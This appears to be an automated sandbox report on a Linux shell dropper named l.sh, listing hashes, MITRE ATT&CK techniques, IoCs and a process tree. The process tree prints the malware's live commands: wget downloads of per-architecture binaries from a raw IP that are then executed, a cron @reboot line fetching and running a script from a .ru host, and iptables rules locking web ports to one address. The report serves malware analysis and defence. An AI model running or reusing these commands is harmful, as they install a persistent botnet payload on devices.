c632725093e64d00e75fd6ac65faa0b27880419911c47b99319fae9a92e845f8

Analysis

max time kernel
150s
max time network
138s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
28-12-2024 10:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

l.sh
Size

1KB
MD5

f1bc5c9578ad5b69e09a58a6b3721b64
SHA1

b7ce08c279c3c9c846a9f8edb4214e7fc4a40d72
SHA256

c632725093e64d00e75fd6ac65faa0b27880419911c47b99319fae9a92e845f8
SHA512

5afccb744365dc43090fa8c18e965708c3e45f8239268a31e2453cc3c32ff7bab095fc1718d2f89d3c597770c973a000722b4cba95c78896b1e63a92dba93788

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
844	chmod
846	sh
854	chmod
860	chmod
766	chmod
787	chmod
826	chmod
783	chmod
799	chmod
857	chmod

Executes dropped EXE 8 IoCs

ioc	pid	Process
/run/user/0/upnp	784	upnp
/run/user/0/upnp	788	upnp
/run/user/0/upnp	801	upnp
/run/user/0/upnp	827	upnp
/run/user/0/upnp	845	upnp
/run/user/0/upnp	855	upnp
/run/user/0/upnp	858	upnp
/run/user/0/upnp	861	upnp

Renames itself 1 IoCs

pid	Process
845	upnp

Unexpected DNS network traffic destination 2 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	178.254.22.166
Destination IP	51.158.108.203

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.4hU9te	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	[watchdog/0]	845	upnp

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/888/status	upnp
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/73/stat	killall
File opened for reading	/proc/732/cmdline	killall
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/12/stat	killall
File opened for reading	/proc/720/stat	killall
File opened for reading	/proc/881/status	upnp
File opened for reading	/proc/887/status	upnp
File opened for reading	/proc/74/stat	killall
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/328/stat	killall
File opened for reading	/proc/877/status	upnp
File opened for reading	/proc/856/status	upnp
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/863/status	upnp
File opened for reading	/proc/883/status	upnp
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/737/stat	killall
File opened for reading	/proc/705/stat	killall
File opened for reading	/proc/self/exe	cp
File opened for reading	/proc/867/status	upnp
File opened for reading	/proc/833/cmdline	upnp
File opened for reading	/proc/874/status	upnp
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/124/stat	killall
File opened for reading	/proc/76/stat	killall
File opened for reading	/proc/245/stat	killall
File opened for reading	/proc/667/stat	killall
File opened for reading	/proc/671/stat	killall
File opened for reading	/proc/859/status	upnp
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/72/stat	killall
File opened for reading	/proc/868/status	upnp
File opened for reading	/proc/886/status	upnp
File opened for reading	/proc/736/stat	killall
File opened for reading	/proc/882/status	upnp
File opened for reading	/proc/854/status	upnp
File opened for reading	/proc/857/status	upnp
File opened for reading	/proc/865/status	upnp
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/18/stat	killall
File opened for reading	/proc/mounts	cat
File opened for reading	/proc/866/status	upnp
File opened for reading	/proc/327/stat	killall
File opened for reading	/proc/330/stat	killall
File opened for reading	/proc/861/status	upnp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/872/status	upnp
File opened for reading	/proc/875/status	upnp
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/71/stat	killall
File opened for reading	/proc/381/stat	killall
File opened for reading	/proc/123/stat	killall
File opened for reading	/proc/862/status	upnp
File opened for reading	/proc/869/status	upnp
File opened for reading	/proc/698/stat	killall
File opened for reading	/proc/734/stat	killall
File opened for reading	/proc/739/stat	killall

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
845	upnp
830	wget

Writes file to shm directory 1 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

description	ioc	Process
File opened for modification	/dev/shm/.a	l.sh

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.a	l.sh

/tmp/l.sh
/tmp/l.sh
1⤵
- Writes file to shm directory
- Writes file to tmp directory
PID:739
- /usr/bin/killall
  killall -9 dvrLocker
  2⤵
  - Reads runtime system information
  PID:740
- /bin/cat
  cat /proc/mounts
  2⤵
  - Reads runtime system information
  PID:745
- /usr/bin/cut
  cut -d " " -f 2
  2⤵
  PID:749
- /bin/grep
  grep -v noexe
  2⤵
  PID:748
- /bin/grep
  grep rw
  2⤵
  PID:747
- /bin/grep
  grep tmpfs
  2⤵
  PID:746
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:756
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:757
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:759
- /bin/cp
  cp /proc/self/exe .f
  2⤵
  - Reads runtime system information
  PID:763
- /bin/chmod
  chmod 777 .f
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /bin/rm
  rm -rf upnp
  2⤵
  PID:768
- /usr/bin/wget
  wget http://103.188.82.218/t/arm -O -
  2⤵
  PID:770
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /run/user/0/upnp
  ./upnp tplink.arm
  2⤵
  - Executes dropped EXE
  PID:784
- /usr/bin/wget
  wget http://103.188.82.218/t/arm5 -O -
  2⤵
  PID:786
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /run/user/0/upnp
  ./upnp tplink.arm5
  2⤵
  - Executes dropped EXE
  PID:788
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:790
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /run/user/0/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:801
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:804
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /run/user/0/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:827
- /usr/bin/wget
  wget http://103.188.82.218/t/mips -O -
  2⤵
  - System Network Configuration Discovery
  PID:830
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /run/user/0/upnp
  ./upnp tplink.mips
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:845
- - /bin/sh
    sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    3⤵
    - File and Directory Permissions Modification
    PID:846
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:848
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:849
- /usr/bin/wget
  wget http://103.188.82.218/t/mpsl -O -
  2⤵
  PID:853
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /run/user/0/upnp
  ./upnp tplink.mpsl
  2⤵
  - Executes dropped EXE
  PID:855
- /usr/bin/wget
  wget http://103.188.82.218/t/ppc -O -
  2⤵
  PID:856
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /run/user/0/upnp
  ./upnp tplink.ppc
  2⤵
  - Executes dropped EXE
  PID:858
- /usr/bin/wget
  wget http://103.188.82.218/t/x86 -O -
  2⤵
  PID:859
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /run/user/0/upnp
  ./upnp tplink.x86
  2⤵
  - Executes dropped EXE
  PID:861
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 443 -s 95.214.53.205 -j ACCEPT
  2⤵
  PID:862
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 80 -s 95.214.53.205 -j ACCEPT
  2⤵
  PID:863
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 8081 -s 95.214.53.205 -j ACCEPT
  2⤵
  PID:864
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 8080 -s 95.214.53.205 -j ACCEPT
  2⤵
  PID:865
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 8888 -s 95.214.53.205 -j ACCEPT
  2⤵
  PID:866
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 80 -j DROP
  2⤵
  PID:868
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 8081 -j DROP
  2⤵
  PID:869
- /sbin/iptables
  iptables -A INPUT -p tcp --dport 8888 -j DROP
  2⤵
  PID:871

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/user/0/.f

Filesize
147KB

MD5
01a5d0e23c4549b0175d447763aba5f8

SHA1
521ba6a7c5307aa62066eb1ff1506923a2cde039

SHA256
7b3ca2b54ab25e31cb95eb97e25ea963dc3c1d10487e4e82fb998a46375eeffd

SHA512
50c4f6c846a0a838ca1dd4bc1241aa40df6c447c70139a933a3ec4b0aa493349f6174ad463b1ba9e61ef73b4fe1240492e278643b15c8e4260dbf1a4773dab37

Download Submit
/run/user/0/upnp

Filesize
73KB

MD5
f812a7b3a877f717eb6e54b843b41848

SHA1
21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25

SHA256
9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560

SHA512
c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

Download Submit
/run/user/0/upnp

Filesize
85KB

MD5
d8b9115310ca0429f6ec2473696156a2

SHA1
5497d765ad0b6ad6ed2204338faecd9671f6a60c

SHA256
7f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c

SHA512
a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664

Download Submit
/run/user/0/upnp

Filesize
99KB

MD5
559f129d380ad1cfb60792c6b2dc3d32

SHA1
3997a0fc0bd5958783f1751364ec407c5b170adc

SHA256
fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d

SHA512
9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

Download Submit
/run/user/0/upnp

Filesize
100KB

MD5
4ad582d49f505bfab7de84881998685b

SHA1
5f09f4baed114b594729ded91e2c4d263f0e2754

SHA256
b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1

SHA512
6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

Download Submit
/run/user/0/upnp

Filesize
77KB

MD5
d09db60a70d5b53b5b53ad39476fd7e8

SHA1
73a75e5e8200f77d857a7256cc0979077e29241d

SHA256
36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165

SHA512
ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

Download Submit
/var/spool/cron/crontabs/tmp.4hU9te

Filesize
306B

MD5
e5064dbeaa4e85dc0cb3058ca4bb2809

SHA1
cd11bcae4aa47252da620b513f75971915b9ce87

SHA256
32147c6f98d2e14c483b900c2fc0b9dca8e31e1efbd207eb6a1fac5a6572535b

SHA512
4de299509f7b6fa9b52a5305ae4db8dc06dd70778aaca4cd8b40846f9e0a5f5957284060d8d9b8f99947ecf65b3e9dd13a9d563bba2b71b760b830079cc7790e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads